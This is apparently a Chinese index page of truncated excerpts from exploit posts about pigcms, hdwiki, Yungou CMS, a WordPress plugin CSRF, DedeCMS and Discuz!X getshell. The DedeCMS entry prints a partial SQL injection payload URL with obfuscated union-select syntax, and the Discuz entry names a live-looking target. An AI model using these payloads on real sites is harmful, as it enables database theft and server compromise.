pigcms&iwxcms 微信管理系统漏洞利用工具
这个漏洞的详情在这里 http://www.wooyun.org/bugs/wooyun-2010-074095 pigcms跟iwxcms 源码都是差不多的,估计是互相抄袭吧? 哈哈 , 不同的只有是表面。 昨晚花点…
hdwiki5.1 SQL注入漏洞
Author:phithon /control/edition.php 119行 [php] function docompare(){ if(!empty($this->setting['check_useragent'])) { …
云购Cms修复不当仍存在Sql注入
漏洞作者: 浅蓝 详细说明: 根据雨牛的 WooYun: Yungoucms Sql Injection 第一枚 我看了下相同位置的代码 [php] public function checked_option(){ …
WordPress插件Easy Social Icons V1.2.2 – CSRF漏洞攻击
FROM http://www.exploit-db.com/exploits/36161/ ==================================================== Product: Easy Social Icons WordPress plugin Vendor: Cyb…
DedeCMS 20140201 之前的5.7通杀
无需注册会员账号: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT…
Discuz!X系列转换工具任意代码写入漏洞 getshell
有些论坛 可能路径放在其它目录 没有utility 直接convert等 如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功 http://mianguage.com/utility/convert/index…